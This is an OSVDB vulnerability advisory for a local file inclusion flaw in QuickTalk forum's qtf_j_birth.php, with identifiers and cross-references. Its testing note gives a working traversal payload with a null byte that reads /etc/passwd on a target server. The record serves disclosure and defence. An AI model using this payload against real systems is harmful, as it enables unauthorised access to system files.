QuickTalk forum qtf_j_birth.php lang Variable Local File Inclusion

2007-06-27T00:00:00
ID OSVDB:36486
Type osvdb
Reporter OSVDB
Modified 2007-06-27T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00

References:

Secunia Advisory ID:25868 Related OSVDB ID: 36485 Related OSVDB ID: 36487 Other Advisory URL: http://milw0rm.com/exploits/4115 ISS X-Force ID: 35117 FrSIRT Advisory: ADV-2007-2373 CVE-2007-3505 Bugtraq ID: 24671